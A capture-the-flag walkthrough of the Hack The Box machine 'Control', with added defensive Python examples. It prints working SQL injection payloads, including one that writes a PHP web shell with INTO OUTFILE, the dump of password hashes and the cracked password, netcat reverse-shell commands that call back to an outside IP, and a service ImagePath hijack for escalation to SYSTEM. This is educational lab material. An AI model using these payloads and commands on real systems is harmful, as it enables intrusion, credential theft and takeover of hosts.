This post documents the complete walkthrough of Control, a retired vulnerable VM created by TRX, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

Control is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports on the host.

# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.167 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-11-25 07:40:50 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 135/tcp on 10.10.10.167
Discovered open port 49667/tcp on 10.10.10.167
Discovered open port 49666/tcp on 10.10.10.167
Discovered open port 3306/tcp on 10.10.10.167
Discovered open port 80/tcp on 10.10.10.167

Nothing unusual. Let’s do one better with nmap scanning the discovered ports to establish their services.

# nmap -n -v -Pn -p80,135,3306 -A --reason -oN nmap.txt 10.10.10.167
...
PORT     STATE SERVICE REASON          VERSION
80/tcp   open  http    syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   syn-ack ttl 127 Microsoft Windows RPC
3306/tcp open  mysql?  syn-ack ttl 127
| fingerprint-strings:
|   FourOhFourRequest, GetRequest, LDAPSearchReq, LPDString, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest, afp, giop, ms-sql-s:
|_    Host '10.10.15.82' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

I’m pretty sure there’s a MySQL database service behind 3306/tcp.

That leaves us with the http service. This is what it looks like.

Oh, before I forget, the IIS is running PHP as well.

Admin Interface Bypass

There’s something interesting in the HTML source of index.php.

I’ve checked. /myfiles doesn’t exist. And also there’s this interesting message when I try to access admin.php.

I put two and two together and made an educated guess: this is the client IP address that’s allowed to access admin.php, usually supplied through an X-Forwarded-For type of header. To facilitate that, we can make use of Burp’s Bypass WAF extension.

Set the scope to the remote machine and we are good to go.

Presto!
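The bypass works because the page decides who the client is from a header the client controls. As an added example (not code from the box or from this walkthrough), the Python below contrasts that check with one that uses the TCP peer address and honours X-Forwarded-For only when the request arrives from a known reverse proxy; the addresses and function names are constructed for illustration.

```python
import ipaddress

# Constructed values for illustration (documentation address ranges).
ADMIN_ALLOWLIST = {ipaddress.ip_address("192.0.2.10")}
TRUSTED_PROXIES = {ipaddress.ip_address("198.51.100.5")}


def client_ip_naive(peer_addr, headers):
    """Flawed: believes whatever X-Forwarded-For the request carries."""
    xff = headers.get("X-Forwarded-For")
    return ipaddress.ip_address((xff.split(",")[0] if xff else peer_addr).strip())


def client_ip_hardened(peer_addr, headers):
    """Use the socket peer; honour X-Forwarded-For only behind a trusted proxy.

    The header is walked right to left and the first hop that is not one of
    our own proxies is returned, because everything to the left of that hop
    was supplied by the client.
    """
    peer = ipaddress.ip_address(peer_addr)
    if peer not in TRUSTED_PROXIES:
        return peer  # direct connection: the header is ignored entirely
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed header: fall back to the peer address
        if addr not in TRUSTED_PROXIES:
            return addr
    return peer


def admin_allowed(resolver, peer_addr, headers):
    """Apply the allowlist to whichever address the resolver reports."""
    return resolver(peer_addr, headers) in ADMIN_ALLOWLIST
```

An address allowlist is still only a network-location check; the admin page needs real authentication as well.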

Taking baby steps to discover SQL Injection

It wasn’t long before I discovered a classic vulnerability with a single quote (') entered into the search field: SQL injection within the search_products.php page.

Usually, we have to determine the number of columns from the products table, but judging from the above, the number of columns should be five or six. Let’s enter the following into the search field.

' ORDER BY 7 -- -

Confirmed. The number of columns is six. Let’s enter the following into the search field.

' UNION SELECT 1,2,3,4,5,@@VERSION -- -

So, the search_products.php page is susceptible to a UNION-based SQL injection. Time to upload a simple PHP backdoor like so.

<?php echo shell_exec($_GET[0]); ?>

Enter the following into the search field.

' UNION SELECT 1,2,3,4,5,"<br><pre><?php echo htmlentities(shell_exec($_GET[0])); ?></pre>" INTO OUTFILE '\\inetpub\\wwwroot\\cmd.php' -- -

Let’s see if we can execute remote commands through PHP.

Awesome!
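The column probe and the UNION step above both depend on the search term being pasted into the SQL text. As an added example (not the box's code), the Python below reproduces that behaviour against an in-memory SQLite database standing in for MariaDB and shows the same inputs going nowhere once the term is bound as a parameter; the table layout, column names and sample rows are constructed.

```python
import sqlite3


def make_db():
    """Constructed six-column products table plus a second table of secrets."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id, name, quantity, price, tax, category);
        INSERT INTO products VALUES (1, 'widget', 10, 5, 1, 'tools');
        CREATE TABLE accounts (user, password);
        INSERT INTO accounts VALUES ('demo', 'constructed-hash');
    """)
    return db


def search_vulnerable(db, term):
    # Flawed: the search term becomes part of the SQL statement itself.
    sql = "SELECT * FROM products WHERE name = '" + term + "'"
    return db.execute(sql).fetchall()


def search_parameterized(db, term):
    # The term is bound as data and cannot change the statement's shape.
    return db.execute("SELECT * FROM products WHERE name = ?", (term,)).fetchall()


def column_probe_fails(db, n):
    """True when ORDER BY n is rejected, i.e. the query has fewer than n columns."""
    try:
        search_vulnerable(db, f"' ORDER BY {n} -- -")
        return False
    except sqlite3.OperationalError:
        return True
```

Parameterization closes the injection itself. Separately, the INTO OUTFILE write and the later read of mysql.user only work when the application's database account holds the FILE privilege and can read the mysql schema, so a least-privilege account limits the damage of any injection that remains.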

Low-Privilege Shell

Time to get that shell. First, let’s transfer nc.exe (from /usr/share/windows-resources/binaries/nc.exe) to a world-writable folder (like \Windows\System32\spool\drivers\color).

Let’s run the reverse shell back to us while nc listens for the incoming shell.

And we have the initial foothold.

Hector is in the Remote Management Users group

During enumeration of iusr’s account, I noticed that Hector is in the Remote Management Users group. That means his credentials must be lying somewhere…

Get that hash

To be honest, I was pleasantly surprised that I could even run the following SQLi and that it yielded something.

' UNION SELECT 1,2,3,4,user, password from mysql.user -- -

What do we have here? Hector’s password hash!

John the Ripper

Armed with Hector’s password hash, let’s show John the Ripper some :heart:.

Hector’s password is l33th4x0rhector.

PowerShell Remoting / WinRM

Now that we have Hector’s password, we can proceed to log in to Hector’s account via PowerShell Remoting. But first, we need to spawn a PowerShell. To do that, we can use nc.exe to spawn another reverse shell and enter into PowerShell from there.

The hostname is Fidelity by the way. That’s the only plot twist.

With that, we can execute Start-Process to call upon our nc.exe to run the third reverse shell. This time as Hector. :wink:

> Start-Process -FilePath \windows\system32\spool\drivers\color\cute.exe -ArgumentList "10.10.15.82 4444 -e cmd" -NoNewWindow

Getting user.txt

The file user.txt is at Hector’s Desktop. No surprise there.

Privilege Escalation

During enumeration of Hector’s account, I noticed that Hector is able to do something special with one of the Registry keys.

I generated the above with AccessChk from Microsoft SysInternals like so.

> accesschk.exe -klr hklm\system\currentcontrolset

That means that Hector is able to change the ImagePath of any service of my choice, but which one? The service must be in a stopped state, run as LocalSystem with no dependencies and more importantly, Hector must have the permissions to start the service.

Long story short, I chose Secondary Logon service or seclogon. Here’s why.

Stopped state

Run as LocalSystem with no dependencies

Hector is able to start the service

Basically, the security descriptor string says that Hector, as an Authenticated User, has the Read Property (RP) right on the service object. For a service, the RP bit corresponds to SERVICE_START, i.e. Hector can start the Secondary Logon service.
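For auditing the same condition across services, the added example below (not part of the original walkthrough) decodes a service security descriptor in the format printed by sc sdshow and lists allow ACEs that give broad built-in groups start, reconfigure or ACL-change rights. The sample SDDL string is constructed, and only two-letter right codes are decoded.

```python
import re

# SDDL right codes as they apply to a Windows service object.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE",
    "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
BROAD_TRUSTEES = {"AU": "Authenticated Users", "WD": "Everyone",
                  "BU": "Builtin Users", "IU": "Interactive"}
REVIEW = {"SERVICE_START", "SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER"}

# One ACE: (type;flags;rights;object_guid;inherit_guid;trustee)
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")

# Constructed sample, not the descriptor from the box.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
               "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWRPLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def parse_service_dacl(sddl):
    """Return [(ace_type, trustee, [rights])] for each ACE in the D: section."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # drop the SACL, if any
    aces = []
    for ace_type, _flags, rights, _obj, _inh, trustee in ACE_RE.findall(dacl):
        # Hex access masks are passed through undecoded.
        codes = re.findall("..", rights) if rights.isalpha() else [rights]
        aces.append((ace_type, trustee, [SERVICE_RIGHTS.get(c, c) for c in codes]))
    return aces


def broad_grants(sddl):
    """Allow ACEs that give a broad group a right worth reviewing."""
    findings = []
    for ace_type, trustee, rights in parse_service_dacl(sddl):
        hits = sorted(REVIEW.intersection(rights))
        if ace_type == "A" and trustee in BROAD_TRUSTEES and hits:
            findings.append((BROAD_TRUSTEES[trustee], hits))
    return findings
```

A start right held by Authenticated Users matters most when, as on this box, the same user can also write the service's registry key, so review the key's ACL alongside the descriptor.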

Getting root.txt

To change the ImagePath of the seclogon service, we can use the very versatile REG.EXE command.

> REG DELETE HKLM\SYSTEM\CURRENTCONTROLSET\Services\seclogon /v ImagePath /f
> REG ADD HKLM\SYSTEM\CURRENTCONTROLSET\Services\seclogon /v ImagePath /t REG_SZ /d "%WINDIR%\System32\cmd.exe /c start %WINDIR%\system32\spool\drivers\color\cute.exe 10.10.15.82 5555 -e cmd.exe" /f
> sc start seclogon

Time to claim the prize…

:dancer: